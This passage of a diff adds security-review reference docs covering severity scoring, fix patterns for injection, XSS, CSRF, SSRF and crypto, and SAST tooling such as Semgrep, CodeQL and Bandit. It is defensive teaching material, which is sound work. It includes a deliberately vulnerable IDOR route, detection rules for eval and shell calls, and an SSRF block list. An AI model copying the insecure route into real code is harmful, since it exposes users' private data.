+## Vulnerability Classification
+
+Use this framework to assign severity and communicate findings consistently. It aligns with CVSS v3.1 concepts but is adapted for manual code review where full exploit chains may not be confirmed.
+
+### Severity Levels
+
+| Severity | CVSS Range | Criteria | Example |
+|----------|-----------|----------|---------|
+| Critical | 9.0–10.0 | Unauthenticated remote code execution, authentication bypass on all users, direct database dump | SQLi returning all user credentials with no auth required |
+| High | 7.0–8.9 | Authenticated RCE, significant data breach (own data + others'), privilege escalation to admin | IDOR allowing any user to read any other user's private data |
+| Medium | 4.0–6.9 | Limited data exposure, requires user interaction, partial access control bypass | Reflected XSS requiring victim to click crafted link |
+| Low | 0.1–3.9 | Minimal impact, requires significant preconditions, defense-in-depth failure | Verbose error message revealing stack trace to authenticated user |
+| Informational | 0.0 | No direct exploitability; best practice deviation, missing hardening | Missing `X-Content-Type-Options` header |
+
+### CVSS-Aligned Manual Scoring
+
+When a full CVSS vector is not available, score findings using these dimensions:
+
+| Dimension | Options | Weight |
+|-----------|---------|--------|
+| Attack Vector | Network (N) / Adjacent (A) / Local (L) / Physical (P) | High — N elevates severity |
+| Attack Complexity | Low (L) / High (H) | Medium — H reduces severity |
+| Privileges Required | None (N) / Low (L) / High (H) | High — N elevates severity |
+| User Interaction | None (N) / Required (R) | Medium — R reduces severity |
+| Confidentiality Impact | None / Low / High | High |
+| Integrity Impact | None / Low / High | High |
+| Availability Impact | None / Low / High | Medium |
+
+**Scoring heuristic for manual findings:**
+
+1. Start at Medium (5.0).
+2. Add 2.0 if attack vector is Network and no authentication required.
+3. Add 1.5 if confidentiality impact is High (credential or PII exposure).
+4. Add 1.5 if integrity impact is High (data modification, code execution).
+5. Subtract 1.5 if user interaction is Required.
+6. Subtract 1.0 if attack complexity is High.
+7. Cap at 10.0; floor at 0.1.
+
+### Exploitability vs. Impact Matrix
+
+Use this matrix to communicate risk when CVSS is not appropriate (e.g., business logic flaws):
+
+| Exploitability | Impact: Low | Impact: Medium | Impact: High |
+|---------------|-------------|----------------|--------------|
+| Easy (no auth, automated) | Medium | High | Critical |
+| Moderate (auth required, manual steps) | Low | Medium | High |
+| Hard (complex preconditions, insider) | Informational | Low | Medium |
+
+### Finding Report Fields
+
+Every finding must include:
+
+| Field | Description |
+|-------|-------------|
+| Title | Concise vulnerability name including class and location |
+| CWE ID | Primary CWE from MITRE taxonomy |
+| OWASP Category | Corresponding OWASP Top 10 or API Top 10 entry |
+| Severity | Critical / High / Medium / Low / Informational |
+| CVSS Vector | Full v3.1 vector string if calculable |
+| Location | File path, line number, function name |
+| Description | What the vulnerability is and why it is exploitable |
+| Evidence | Minimal code snippet demonstrating the flaw |
+| Impact | What an attacker can achieve if exploited |
+| Reproduction | Step-by-step to confirm the finding |
+
+### Deduplication Rules
+
+When multiple instances of the same vulnerability class appear:
+
+- Report one finding per vulnerability class per component boundary (e.g., one SQLi finding for the `users` module, a separate one for the `orders` module).
+- List all affected locations in the finding's evidence section.
+- Do not create separate findings for each line — this inflates counts without adding signal.
+- Exception: if instances have materially different severity (e.g., one is authenticated, one is not), report separately.
+
+---
+
+## Quick Reference: Taxonomy Cross-Walk
+
+| Vulnerability | CWE | OWASP Top 10 | API Top 10 | ASVS Area |
+|--------------|-----|-------------|------------|-----------|
+| SQL Injection | CWE-89 | A03 | — | V5 |
+| Stored XSS | CWE-79 | A03 | — | V5 |
+| IDOR / BOLA | CWE-862 | A01 | API1 | V4 |
+| Broken JWT | CWE-347 | A07 | API2 | V3 |
+| SSRF | CWE-918 | A10 | API7 | V12 |
+| Insecure Deserialization | CWE-502 | A08 | — | V5 |
+| Path Traversal | CWE-22 | A01 | — | V12 |
+| Hardcoded Secret | CWE-798 | A07 | API8 | V14 |
+| CSRF | CWE-352 | A01 | — | V4 |
+| Mass Assignment | CWE-915 | A04 | API3 | V4 |
+| OS Command Injection | CWE-78 | A03 | — | V5 |
+| Unrestricted File Upload | CWE-434 | A04 | — | V12 |
+| Missing Rate Limiting | CWE-770 | A04 | API4 | V11 |
+| Verbose Error Messages | CWE-209 | A05 | API8 | V7 |
+| Outdated Dependencies | CWE-1035 | A06 | API9 | V14 |

--- a/skills/security-review/references/remediation-patterns.md
+++ b/skills/security-review/references/remediation-patterns.md
@@ -1,0 +1,449 @@
+# Remediation Patterns
+
+Sources: OWASP Prevention Cheat Sheet Series, MITRE CWE mitigations, NIST SP 800-53 security controls, CWE/SANS Top 25 remediation guidance
+
+Covers: Fix patterns for injection, XSS, CSRF, SSRF, authentication, authorization, cryptography, deserialization, file handling, HTTP headers, error handling, and logging — one section per vulnerability class, with code examples showing the corrected implementation.
+
+## Input Validation
+
+Validate all input at every trust boundary. Treat all external data — HTTP parameters, headers, cookies, file uploads, API payloads — as untrusted until validated.
+
+- **Allowlist over denylist.** Define exactly what is permitted; reject everything else. Denylists are incomplete by definition.
+- **Validate type, length, range, and format.** A field accepting a user ID should accept only positive integers within a known range.
+- **Server-side validation is mandatory.** Client-side validation is a UX convenience, not a security control.
+- **Fail closed.** On validation failure, reject the input. Never attempt to sanitize and continue with malformed data.
+
+| Input Type | Validation Rule |
+|------------|----------------|
+| Integer ID | Positive integer, within expected range (e.g., 1–2^31) |
+| Email address | RFC 5321 format via library; max 254 characters |
+| Username | Allowlist: `[a-zA-Z0-9_-]`, 3–32 characters |
+| File upload | Magic bytes check, MIME type allowlist, max size |
+| URL | Parse with URL library, validate scheme (https only), validate host against allowlist |
+| Free text | Max length, strip null bytes; encode on output, not on input |
+
+```python
+import re
+EMAIL_PATTERN = re.compile(r'^[a-zA-Z0-9._%+\-]+@[a-zA-Z0-9.\-]+\.[a-zA-Z]{2,}$')
+
+def validate_email(value: str) -> str:
+    if not isinstance(value, str) or len(value) > 254:
+        raise ValueError("Invalid email")
+    if not EMAIL_PATTERN.match(value):
+        raise ValueError("Invalid email format")
+    return value.lower().strip()
+```
+
+## Parameterized Queries (SQL Injection Prevention)
+
+Never construct SQL by concatenating or interpolating user-supplied values. Use parameterized queries or prepared statements in every language and framework.
+
+```javascript
+// Node.js (pg)
+const result = await pool.query('SELECT * FROM users WHERE id = $1', [userId]);
+```
+
+```python
+# Python (psycopg2)
+cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
+```
+
+```go
+// Go (database/sql)
+row := db.QueryRowContext(ctx, "SELECT * FROM users WHERE id = $1", userID)
+```
+
+```java
+// Java (PreparedStatement)
+PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE id = ?");
+ps.setInt(1, userId);
+ResultSet rs = ps.executeQuery();
+```
+
+ORMs do not eliminate injection risk when raw query methods (`raw()`, `query()`, `execute()`) are used. Apply the same discipline to those call sites.
+
+## Output Encoding (XSS Prevention)
+
+Encoding context determines the correct encoding function. Applying the wrong encoder for the context does not prevent XSS.
+
+| Output Context | Correct Encoding |
+|----------------|-----------------|
+| HTML body | HTML entity encoding (`&`, `<`, `>`, `"`, `'`) |
+| HTML attribute | HTML attribute encoding (quote all attributes) |
+| JavaScript string | JavaScript string escaping (`\`, `"`, `'`, newlines) |
+| URL parameter | Percent-encoding (`encodeURIComponent`) |
+| CSS value | CSS hex encoding |
+
+```jsx
+// React: JSX auto-escapes text content — safe by default
+function UserProfile({ name }) { return <div>{name}</div>; }
+
+// When raw HTML is required: sanitize first with DOMPurify
+import DOMPurify from 'dompurify';
+function RichContent({ untrustedHtml }) {
+  const clean = DOMPurify.sanitize(untrustedHtml, {
+    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
+    ALLOWED_ATTR: ['href'],
+  });
+  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
+}
+```
+
+Deploy CSP as defense in depth. A strict policy limits the blast radius of any XSS that slips through:
+
+```
+Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'
+```
+
+## Command Injection Prevention
+
+Never pass user-controlled data to a shell via string interpolation. The shell interprets metacharacters (`;`, `|`, `&`, `$`, `(`, `)`) as control characters.
+
+```python
+# Correct: list form, shell=False (default)
+result = subprocess.run(["ls", "-la", validated_path], shell=False, capture_output=True, timeout=10)
+```
+
+```javascript
+// Correct: execFile does not invoke a shell
+const { execFile } = require('child_process');
+execFile('convert', [inputPath, '-resize', '800x600', outputPath], callback);
+```
+
+If a shell is unavoidable, maintain an explicit allowlist of permitted values and validate against it before substitution. Never construct the command string from raw user input.
+
+## SSRF Prevention
+
+Server-Side Request Forgery allows attackers to make the server issue HTTP requests to internal infrastructure or cloud metadata endpoints.
+
+1. **Allowlist permitted destinations.** Enforce an explicit list of permitted hosts.
+2. **Block private and link-local IP ranges** before connecting.
+3. **Resolve the hostname, validate the resolved IP, then connect.** Prevents DNS rebinding.
+4. **Route outbound HTTP through a dedicated egress proxy** that enforces the allowlist at the network layer.
+
+| Blocked Range | Description |
+|---------------|-------------|
+| `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16` | RFC 1918 private |
+| `127.0.0.0/8` | Loopback |
+| `169.254.169.254/32` | AWS/GCP/Azure metadata endpoint |
+| `::1/128`, `fc00::/7` | IPv6 loopback and unique local |
+
+```python
+import ipaddress, socket, urllib.parse, httpx
+
+ALLOWED_HOSTS = {'api.example.com', 'cdn.example.com'}
+
+def safe_fetch(url: str) -> bytes:
+    parsed = urllib.parse.urlparse(url)
+    if parsed.scheme != 'https' or parsed.hostname not in ALLOWED_HOSTS:
+        raise ValueError("URL not permitted")
+    addr = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
+    if addr.is_private or addr.is_loopback or addr.is_link_local:
+        raise ValueError("Resolved IP is in a blocked range")
+    return httpx.get(url, follow_redirects=False, timeout=10).content
+```
+
+## CSRF Prevention
+
+Cross-Site Request Forgery tricks an authenticated user's browser into submitting a state-changing request to a site where they are logged in.
+
+1. **`SameSite=Lax` or `SameSite=Strict` on session cookies.** `Strict` blocks the cookie on all cross-site requests; `Lax` allows top-level navigations.
+2. **Synchronizer token pattern.** Server generates a per-session token, stores it server-side, and requires it in a request header or body field.
+3. **Double-submit cookie.** Token stored in both a cookie and a request header; server verifies they match.
+
+```
+Set-Cookie: session=<token>; HttpOnly; Secure; SameSite=Lax; Path=/
+```
+
+```javascript
+// Express: csurf middleware
+app.use(csrf({ cookie: true }));
+app.get('/transfer', (req, res) => res.render('transfer', { csrfToken: req.csrfToken() }));
+// csurf validates req.body._csrf automatically on POST
+```
+
+```html
+<form method="POST" action="/transfer">
+  <input type="hidden" name="_csrf" value="<%= csrfToken %>">
+</form>
+```
+
+## Authentication Hardening
+
+### Password Storage
+
+Never store passwords in plaintext or with reversible encryption. Never use MD5, SHA-1, or unsalted SHA-256 — they are too fast and trivially brute-forced.
+
+| Algorithm | Recommended Parameters | Notes |
+|-----------|----------------------|-------|
+| Argon2id | `m=65536, t=3, p=4` | Preferred for new systems |
+| bcrypt | cost factor 12 or higher | Widely supported |
+| scrypt | `N=32768, r=8, p=1` | Acceptable alternative |
+
+```python
+from argon2 import PasswordHasher
+ph = PasswordHasher(time_cost=3, memory_cost=65536, parallelism=4)
+
+def hash_password(plaintext: str) -> str:
+    return ph.hash(plaintext)
+
+def verify_password(stored_hash: str, plaintext: str) -> bool:
+    try:
+        return ph.verify(stored_hash, plaintext)
+    except Exception:
+        return False
+```
+
+### Rate Limiting, Lockout, and Sessions
+
+- Limit login attempts to 5 per minute per IP and per account; apply exponential backoff after failures.
+- Use temporary lockout (15 minutes), not permanent — permanent lockout enables denial-of-service.
+- Return the same error message for invalid username and invalid password to prevent user enumeration.
+- Regenerate the session ID immediately after successful login.
+- Set an absolute session timeout (8 hours) and an idle timeout (30 minutes).
+- Invalidate the session server-side on logout — do not merely clear the client-side cookie.
+
+## Authorization Enforcement
+
+Authorization must be enforced at the API or service layer. UI-level hiding of controls is not a security control.
+
+### Object-Level Authorization (IDOR Prevention)
+
+Always scope queries to the authenticated user. Fetching a resource by ID alone allows any authenticated user to access any record.
+
+```javascript
+// Incorrect: fetches any order by ID
+app.get('/orders/:id', async (req, res) => {
+  const order = await db.query('SELECT * FROM orders WHERE id = $1', [req.params.id]);
+  res.json(order.rows[0]);
+});
+
+// Correct: scopes to the authenticated user
+app.get('/orders/:id', authenticate, async (req, res) => {
+  const order = await db.query(
+    'SELECT * FROM orders WHERE id = $1 AND user_id = $2',
+    [req.params.id, req.user.id]
+  );
+  if (!order.rows[0]) return res.status(404).json({ error: 'Not found' });
+  res.json(order.rows[0]);
+});
+```
+
+### Role-Based Middleware and Indirect References
+
+```javascript
+function requireRole(...roles) {
+  return (req, res, next) => {
+    if (!req.user || !roles.includes(req.user.role))
+      return res.status(403).json({ error: 'Forbidden' });
+    next();
+  };
+}
+app.delete('/admin/users/:id', authenticate, requireRole('admin'), deleteUser);
+```
+
+Use UUIDs as public-facing resource identifiers. Sequential integer IDs make enumeration trivial.
+
+```sql
+CREATE TABLE documents (
+  id        SERIAL PRIMARY KEY,
+  public_id UUID DEFAULT gen_random_uuid() UNIQUE NOT NULL,
+  user_id   INTEGER NOT NULL REFERENCES users(id)
+);
+```
+
+## Cryptographic Best Practices
+
+| Operation | Use | Never Use |
+|-----------|-----|-----------|
+| Password hashing | Argon2id, bcrypt (cost 12+) | MD5, SHA-1, SHA-256 (too fast) |
+| Symmetric encryption | AES-256-GCM | AES-ECB, DES, 3DES |
+| Asymmetric encryption | RSA-OAEP (2048+), Ed25519 | RSA-PKCS1v1.5, DSA |
+| Hashing (non-password) | SHA-256, SHA-3, BLAKE3 | MD5, SHA-1 |
+| Random values | `crypto.randomBytes`, `secrets.token_urlsafe` | `Math.random`, `random.random` |
+| TLS | 1.2 minimum, 1.3 preferred | SSL, TLS 1.0, TLS 1.1 |
+| Key derivation | HKDF, PBKDF2 (600,000+ iterations) | Direct use of password as key |
+
+```javascript
+// Node.js: cryptographically secure random token
+const token = require('crypto').randomBytes(32).toString('hex');
+
+// AES-256-GCM encryption
+function encrypt(plaintext, key) {
+  const iv = require('crypto').randomBytes(12); // 96-bit IV for GCM
+  const cipher = require('crypto').createCipheriv('aes-256-gcm', key, iv);
+  const data = Buffer.concat([cipher.update(plaintext, 'utf8'), cipher.final()]);
+  return { iv: iv.toString('hex'), tag: cipher.getAuthTag().toString('hex'), data: data.toString('hex') };
+}
+```
+
+```python
+import secrets
+token = secrets.token_urlsafe(32)  # URL-safe base64, 32 bytes of entropy
+```
+
+## Secure Deserialization
+
+Native serialization formats (Python `pickle`, Java `ObjectInputStream`, PHP `unserialize`, Ruby `Marshal`) execute arbitrary code during deserialization. Never deserialize untrusted data with these mechanisms.
+
+| Language | Safe Format | Library |
+|----------|-------------|---------|
+| Python | JSON | `json` (stdlib) |
+| Java | JSON | Jackson with `@JsonTypeInfo` disabled |
+| PHP | JSON | `json_decode` |
+| Any | Protocol Buffers | `protobuf` |
+
+If native Java deserialization is unavoidable, use `ObjectInputFilter` to allowlist permitted classes:
+
+```java
+ois.setObjectInputFilter(info -> {
+    Class<?> cls = info.serialClass();
+    if (cls == null) return ObjectInputFilter.Status.UNDECIDED;
+    return (cls == MyDataClass.class)
+        ? ObjectInputFilter.Status.ALLOWED
+        : ObjectInputFilter.Status.REJECTED;
+});
+```
+
+Validate the structure and types of deserialized data before acting on it, even when using safe formats:
+
+```python
+from pydantic import BaseModel, validator
+
+class TransferRequest(BaseModel):
+    from_account: str
+    to_account: str
+    amount: float
+
+    @validator('amount')
+    def must_be_positive(cls, v):
+        if v <= 0: raise ValueError('Amount must be positive')
+        return v
+```
+
+## Secure File Handling
+
+- **Validate by content, not extension.** Check magic bytes (file signature) to determine actual file type.
+- **Maintain an allowlist of permitted MIME types.** Reject anything not on the list.
+- **Enforce size limits** before reading the full file into memory.
+- **Generate a random filename** for storage. Never use the user-supplied filename as the storage path.
+- **Store uploads outside the webroot.** Files inside the webroot may be directly accessible or executed.
+
+```python
+import magic, os, secrets
+
+ALLOWED_MIME_TYPES = {'image/jpeg', 'image/png', 'image/webp', 'application/pdf'}
+MAX_FILE_SIZE = 10 * 1024 * 1024  # 10 MB
+UPLOAD_DIR = '/var/app/uploads'   # outside webroot
+
+def store_upload(file_bytes: bytes) -> str:
+    if len(file_bytes) > MAX_FILE_SIZE:
+        raise ValueError("File exceeds size limit")
+    mime = magic.from_buffer(file_bytes, mime=True)
+    if mime not in ALLOWED_MIME_TYPES:
+        raise ValueError(f"File type not permitted: {mime}")
+    filename = secrets.token_hex(16) + '.' + mime.split('/')[-1]
+    with open(os.path.join(UPLOAD_DIR, filename), 'wb') as f:
+        f.write(file_bytes)
+    return filename
+```
+
+Serve uploaded files with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff`. Serving with `Content-Type: text/html` enables stored XSS via MIME sniffing.
+
+## Secure HTTP Headers
+
+Apply these headers to every HTTP response. Configure at the reverse proxy or application framework level.
+
+```
+Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'
+Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
+X-Content-Type-Options: nosniff
+X-Frame-Options: DENY
+Referrer-Policy: strict-origin-when-cross-origin
+Permissions-Policy: camera=(), microphone=(), geolocation=(), payment=()
+```
+
+| Header | Purpose | Recommended Value |
+|--------|---------|-------------------|
+| `Content-Security-Policy` | Restricts resource loading; mitigates XSS | Strict allowlist per context |
+| `Strict-Transport-Security` | Forces HTTPS; prevents SSL stripping | `max-age=31536000; includeSubDomains` |
+| `X-Content-Type-Options` | Prevents MIME sniffing | `nosniff` |
+| `X-Frame-Options` | Prevents clickjacking | `DENY` or `SAMEORIGIN` |
+| `Referrer-Policy` | Controls referrer header leakage | `strict-origin-when-cross-origin` |
+| `Cache-Control` | Prevents caching of sensitive responses | `no-store` on authenticated endpoints |
+
+```javascript
+// Express.js: Helmet applies all headers with one call
+app.use(require('helmet')({
+  contentSecurityPolicy: { directives: { defaultSrc: ["'self'"], scriptSrc: ["'self'"], objectSrc: ["'none'"] } },
+  hsts: { maxAge: 31536000, includeSubDomains: true, preload: true },
+}));
+```
+
+## Error Handling
+
+- **Never expose internal details to the client.** Stack traces, file paths, SQL errors, and library versions reveal implementation details useful to attackers.
+- **Log full error details server-side.** Operators need the full context; users do not.
+- **Return structured, generic error responses** with stable error codes clients can handle programmatically.
+- **Avoid resource existence disclosure.** Return `403 Forbidden` rather than `404 Not Found` when a user lacks permission — `404` confirms the resource exists.
+
+```json
+{ "error": "The requested resource was not found.", "code": "RESOURCE_NOT_FOUND", "request_id": "req_01HZ9K3M7P" }
+```
+
+```javascript
+// Express.js: global error handler
+app.use((err, req, res, next) => {
+  logger.error({ requestId: req.id, message: err.message, stack: err.stack, userId: req.user?.id });
+  const status = err.status || 500;
+  res.status(status).json({
+    error: status === 500 ? 'An unexpected error occurred.' : err.message,
+    code: err.code || 'INTERNAL_ERROR',
+    request_id: req.id,
+  });
+});
+```
+
+## Logging and Monitoring
+
+### What to Log
+
+| Event Category | Events to Log |
+|----------------|--------------|
+| Authentication | Login success, login failure, logout, password change, MFA events |
+| Authorization | Access denied, privilege escalation attempts |
+| Input validation | Validation failures at security boundaries |
+| Data access | Access to sensitive records (PII, financial data) |
+| Administrative | User creation/deletion, role changes, configuration changes |
+
+### What Never to Log
+
+- Passwords (plaintext or hashed), session tokens, API keys, JWTs
+- Credit card numbers, CVVs, full national ID numbers
+- Any secret or credential
+
+```json
+{
+  "timestamp": "2026-03-18T14:22:01.342Z",
+  "level": "warn",
+  "event": "auth.login_failed",
+  "username_hash": "sha256:a3f1...",
+  "ip": "203.0.113.42",
+  "request_id": "req_01HZ9K3M7P",
+  "reason": "invalid_credentials"
+}
+```
+
+Hash or truncate identifiers in log entries when the full value is not needed for investigation.
+
+### Alerting Thresholds
+
+| Pattern | Alert Condition |
+|---------|----------------|
+| Brute force | 10+ failed logins for one account in 5 minutes |
+| Credential stuffing | 100+ failed logins across accounts from one IP in 5 minutes |
+| Privilege escalation | Any `403` on an admin endpoint from a non-admin user |
+| Unusual data access | Single user accessing >1000 records in 1 minute |
+| Token reuse after logout | Session token used after server-side invalidation |
+
+Alerts should route to an on-call channel and trigger automated temporary blocks where feasible. Log all automated enforcement actions.

--- a/skills/security-review/references/sast-and-scanning-tools.md
+++ b/skills/security-review/references/sast-and-scanning-tools.md
@@ -1,0 +1,397 @@
+# SAST and Scanning Tools
+
+Sources: Semgrep documentation (2025-2026), GitHub CodeQL documentation, Bandit documentation, OWASP Source Code Analysis Tools
+
+Covers: Tool selection by language and use case, Semgrep usage and custom rule authoring, CodeQL query suites and CLI, Bandit for Python, ESLint security plugins for JavaScript/TypeScript, ast-grep YAML rules, CI/CD pipeline integration, and false positive management workflows.
+
+---
+
+## Tool Selection
+
+| Tool | Best For | Languages | Strength | Limitation |
+|---|---|---|---|---|
+| Semgrep | Fast pattern matching, custom rules, shift-left | 30+ | Speed, custom rules, low setup | No cross-file data flow in OSS tier |
+| CodeQL | Deep taint tracking, CWE coverage, GitHub-native | JS/TS, Python, Java, C/C++, Go, Ruby, Swift, C# | 166 CWEs, full data flow, MRVA | Slow build step, requires GitHub Advanced Security |
+| Bandit | Python AST checks | Python only | Zero config, fast, CI-friendly | Python only, no data flow |
+| eslint-plugin-security | JS/TS inline with existing lint | JavaScript, TypeScript | Integrates with existing ESLint config | Pattern-based only |
+| ast-grep | YAML-driven multi-language patterns | 20+ | Portable rules, fast, no runtime | No semantic analysis |
+
+**Decision guide:**
+
+- New project: run Semgrep with `p/security-audit` and `p/owasp-top-ten` on every PR.
+- Python codebase: add Bandit alongside Semgrep; they cover different checks.
+- GitHub-hosted repo with Advanced Security: enable CodeQL for deep taint analysis.
+- JS/TS monorepo with existing ESLint: add `eslint-plugin-security` to the existing config.
+- Polyglot repo needing portable rules without a runtime dependency: use ast-grep.
+
+---
+
+## Semgrep
+
+Semgrep performs AST-level pattern matching across 30+ languages. It is fast enough to run on every pull request and supports custom rules without compilation.
+
+### Running Semgrep
+
+```bash
+# Basic scan
+semgrep scan --config auto .
+
+# Security-focused scan
+semgrep scan --config p/security-audit --config p/owasp-top-ten .
+
+# CI mode (reports to Semgrep Cloud via SEMGREP_APP_TOKEN)
+semgrep ci
+
+# Diff-only scan — only findings introduced in the current diff
+semgrep scan --config p/security-audit --diff-depth 0 .
+
+# JSON output for downstream processing
+semgrep scan --config p/security-audit --json -o results.json .
+```
+
+**Key rule presets:** `p/security-audit` (broad security checks), `p/owasp-top-ten` (OWASP Top Ten 2021), `p/secrets` (hardcoded credentials), `p/default` (high-confidence rules), `p/sql-injection`, `p/jwt`.
+
+### Writing Custom Semgrep Rules
+
+Place custom rules in `.semgrep/` and reference with `--config .semgrep/`.
+
+```yaml
+rules:
+  - id: dangerous-eval
+    patterns:
+      - pattern: eval($X)
+      - pattern-not: eval("...")
+    message: "eval() with dynamic input enables code injection. Use a safe alternative."
+    severity: ERROR
+    languages: [javascript, typescript]
+    metadata:
+      cwe: ["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code"]
+      owasp: ["A03:2021 - Injection"]
+      confidence: HIGH
+```
+
+**Pattern operators:** `pattern` (must match), `pattern-not` (exclusion), `pattern-either` (OR), `pattern-inside` / `pattern-not-inside` (scope), `metavariable-regex` (constrain with regex), `focus-metavariable` (report specific variable location).
+
+**Example: SQL string concatenation in Python:**
+
+```yaml
+rules:
+  - id: sql-string-concat
+    patterns:
+      - pattern: |
+          $QUERY = "..." + $INPUT
+          $CURSOR.execute($QUERY)
+      - pattern-not: |
+          $CURSOR.execute($QUERY, $PARAMS)
+    message: "SQL query built by string concatenation. Use parameterized queries."
+    severity: ERROR
+    languages: [python]
+    metadata:
+      cwe: ["CWE-89"]
+      owasp: ["A03:2021"]
+```
+
+### Interpreting Results
+
+Semgrep output includes: rule ID, file path, line number, matched code, severity, and message.
+
+**Triage:** Open the file at the reported line. Determine whether attacker-controlled input reaches the sink. True positive: fix it. False positive: suppress with rule ID and reason.
+
+**Suppressing a false positive:**
+
+```javascript
+// nosemgrep: dangerous-eval -- input is validated against an allowlist before this call
+eval(sanitizedExpression);
+```
+
+Always include the rule ID and a brief justification. Bare `# nosemgrep` without a rule ID suppresses all rules and should be avoided.
+
+Semgrep Pro adds cross-file taint tracking and cross-function analysis, which follow data from source to sink across module boundaries.
+
+---
+
+## CodeQL
+
+CodeQL compiles source code into a relational database and runs declarative QL queries against it. It performs full data flow and taint tracking, making it the most thorough SAST option for supported languages.
+
+### Running CodeQL
+
+**GitHub Actions (recommended):**
+
+```yaml
+# .github/workflows/codeql.yml
+name: CodeQL
+on:
+  push:
+    branches: [main]
+  pull_request:
+    branches: [main]
+  schedule:
+    - cron: '0 2 * * 1'
+
+jobs:
+  analyze:
+    runs-on: ubuntu-latest
+    permissions:
+      security-events: write
+      actions: read
+      contents: read
+    strategy:
+      matrix:
+        language: [javascript, python]
+    steps:
+      - uses: actions/checkout@v4
+      - uses: github/codeql-action/init@v3
+        with:
+          languages: ${{ matrix.language }}
+          queries: security-and-quality
+      - uses: github/codeql-action/autobuild@v3
+      - uses: github/codeql-action/analyze@v3
+```
+
+**CLI: create a database and analyze locally:**
+
+```bash
+codeql database create codeql-db --language=javascript --source-root=.
+
+codeql database analyze codeql-db \
+  javascript-security-and-quality.qls \
+  --format=sarif-latest \
+  --output=results.sarif
+```
+
+**Query suites:**
+
+| Suite | Queries | Use |
+|---|---|---|
+| `security-and-quality` | ~491 | Default; covers security and code quality |
+| `security-extended` | ~626 | Adds lower-confidence security queries |
+| `security-experimental` | Varies | Experimental; higher false positive rate |
+
+Use `security-and-quality` as the baseline. Add `security-extended` for high-value targets or pre-release audits. MRVA (Multi-Repository Variant Analysis) runs a query across all repositories in a GitHub organization simultaneously — use it to find a newly discovered vulnerability pattern fleet-wide.
+
+### Key CodeQL Queries
+
+| Language | Query ID | CWE | What It Finds |
+|---|---|---|---|
+| JavaScript/TypeScript | `js/sql-injection` | CWE-89 | SQL built from user-controlled input |
+| JavaScript/TypeScript | `js/xss` | CWE-79 | DOM or reflected XSS via taint flow |
+| JavaScript/TypeScript | `js/path-injection` | CWE-22 | File path constructed from user input |
+| JavaScript/TypeScript | `js/prototype-pollution` | CWE-1321 | Prototype pollution via object merge |
+| Python | `py/sql-injection` | CWE-89 | SQL string formatting with user input |
+| Python | `py/command-line-injection` | CWE-78 | `subprocess` with `shell=True` and user input |
+| Python | `py/code-injection` | CWE-94 | `eval`/`exec` with user input |
+| Java | `java/sql-injection` | CWE-89 | JDBC query built from user input |
+| Java | `java/unsafe-deserialization` | CWE-502 | `ObjectInputStream` with untrusted data |
+| Go | `go/sql-injection` | CWE-89 | SQL via `fmt.Sprintf` into query |
+| Go | `go/path-injection` | CWE-22 | `os.Open` with user-controlled path |
+| C/C++ | `cpp/buffer-overflow` | CWE-120 | Classic buffer overflow patterns |
+
+---
+
+## Bandit (Python)
+
+Bandit performs AST-based security analysis on Python source code. It is fast, requires no configuration to start, and covers Python-specific risks that generic tools miss.
+
+### Running Bandit
+
+```bash
+# Recursive scan with JSON output
+bandit -r . -f json -o bandit-results.json
+
+# Medium and high severity/confidence only
+bandit -r . -l -i
+
+# Exclude test directories
+bandit -r . --exclude ./tests,./venv -f json
+
+# Target specific checks
+bandit -r . -t B301,B302
+```
+
+### Key Bandit Checks
+
+| Check ID | Name | What It Flags |
+|---|---|---|
+| B101 | assert_used | `assert` statements (stripped in optimized bytecode) |
+| B105 | hardcoded_password_string | String literals assigned to password-like variables |
+| B301 | pickle | `pickle.loads` with untrusted data |
+| B303 | md5 | MD5 used for cryptographic purposes |
+| B311 | random | `random` module for security-sensitive values |
+| B324 | hashlib | MD5 or SHA1 in `hashlib` |
+| B501 | request_with_no_cert_validation | `verify=False` in requests |
+| B602 | subprocess_popen_with_shell_equals_true | `subprocess` with `shell=True` |
+| B608 | hardcoded_sql_expressions | SQL string with `SELECT`, `INSERT`, etc. |
+| B701 | jinja2_autoescape_false | Jinja2 with `autoescape=False` |
+| B703 | django_mark_safe | Django `mark_safe()` with variable input |
+
+### Bandit Configuration
+
+Configure via `.bandit` or `pyproject.toml`:
+
+```toml
+[tool.bandit]
+exclude_dirs = ["tests", "migrations"]
+skips = ["B101"]
+```
+
+---
+
+## ESLint Security (JavaScript/TypeScript)
+
+### Setup
+
+```bash
+npm install --save-dev eslint-plugin-security eslint-plugin-no-unsanitized
+```
+
+```javascript
+// eslint.config.js (flat config)
+import security from 'eslint-plugin-security';
+import noUnsanitized from 'eslint-plugin-no-unsanitized';
+
+export default [
+  security.configs.recommended,
+  {
+    plugins: { 'no-unsanitized': noUnsanitized },
+    rules: {
+      'no-unsanitized/method': 'error',
+      'no-unsanitized/property': 'error',
+    },
+  },
+];
+```
+
+### Key Rules
+
+| Rule | Plugin | What It Flags |
+|---|---|---|
+| `security/detect-eval-with-expression` | security | `eval()` with a non-literal argument |
+| `security/detect-non-literal-fs-filename` | security | `fs` methods with variable filenames |
+| `security/detect-non-literal-regexp` | security | `RegExp` constructor with variable pattern |
+| `security/detect-unsafe-regex` | security | Regexes vulnerable to ReDoS |
+| `security/detect-child-process` | security | `child_process` usage |
+| `security/detect-object-injection` | security | Bracket notation with variable key (prototype pollution risk) |
+| `no-unsanitized/method` | no-unsanitized | `insertAdjacentHTML`, `write`, `writeln` with dynamic input |
+| `no-unsanitized/property` | no-unsanitized | `innerHTML`, `outerHTML` assignment with dynamic input |
+
+Note: `detect-object-injection` produces a high false positive rate on normal array/object access. Tune it with `allowedPatterns` or disable it if noise outweighs signal.
+
+---
+
+## ast-grep Security Rules
+
+ast-grep uses YAML rule files to match AST patterns across 20+ languages. It requires no language runtime and integrates into any CI pipeline.
+
+```yaml
+# rules/detect-innerhtml.yml
+id: detect-innerhtml-assignment
+language: JavaScript
+rule:
